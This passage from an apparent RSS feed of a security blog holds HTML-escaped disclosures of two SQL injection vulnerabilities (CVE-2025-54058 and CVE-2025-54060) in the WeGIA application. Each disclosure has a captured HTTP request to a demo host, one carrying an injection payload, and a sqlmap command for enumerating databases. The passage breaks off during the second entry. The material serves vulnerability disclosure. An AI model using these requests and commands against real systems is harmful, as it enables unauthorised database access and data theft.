&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/funcionario/dependente_editarEndereco.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Save the request in &amp;lt;code&amp;gt;req.txt&amp;lt;/code&amp;gt; file:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  POST /html/funcionario/dependente_editarEndereco.php?id_pessoa=3&amp;amp;amp;idatendido_familiares=1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Length: 125
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Origin: https://demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g1$t1751262251$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=ogoa4lr4nrqqudih73o8oj76p1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  cep=52011-040&amp;amp;amp;uf=PE&amp;amp;amp;cidade=Recife&amp;amp;amp;bairro=Gra%C3%A7as&amp;amp;amp;rua=Avenida&#43;Rui&#43;Barbosa&amp;amp;amp;numero_residencia=12&amp;amp;amp;complemento=12&amp;amp;amp;ibge=2611606
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Then, use &amp;lt;code&amp;gt;sqlmap&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-54058/image.png&amp;#34;
	width=&amp;#34;864&amp;#34;
	height=&amp;#34;755&amp;#34;
	srcset=&amp;#34;/p/cve-2025-54058/image_hu_464b5ea2f7936886.png 480w, /p/cve-2025-54058/image_hu_4782a5da1e37635e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;274px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5pwp-39jc-wxj8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5pwp-39jc-wxj8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54060</title>
        <link>https://www.cvehunters.com/p/cve-2025-54060/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54060/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54060-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editarinfopessoalphp-endpoint&amp;#34;&amp;gt;CVE-2025-54060: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54060&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54060&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/funcionario/dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54060-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editarinfopessoalphp-endpoint&amp;#34;&amp;gt;CVE-2025-54060: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54060&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54060&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/html/funcionario/dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/funcionario/dependente_editarInfoPessoal.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;idatendido_familiares&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Save the request in &amp;lt;code&amp;gt;req.txt&amp;lt;/code&amp;gt; file:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  POST /html/funcionario/dependente_editarInfoPessoal.php?id_pessoa=3&amp;amp;amp;idatendido_familiares=1&#43;AND&#43;7539=7538 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Content-Length: 119
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Origin: https://demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Cookie: _ga_F8DXBXLV8J=GS2.1.s1751254790$o22$g1$t1751255920$j46$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  nome=Maria&amp;amp;amp;sobrenomeForm=Silva&amp;amp;amp;gender=f&amp;amp;amp;telefone=%2821%2998652-3758&amp;amp;amp;nascimento=1996-04-04&amp;amp;amp;nome_pai=teste&amp;amp;amp;nome_mae=teste
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Then, use &amp;lt;code&amp;gt;sqlmap&amp;lt;/code&amp;gt;:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
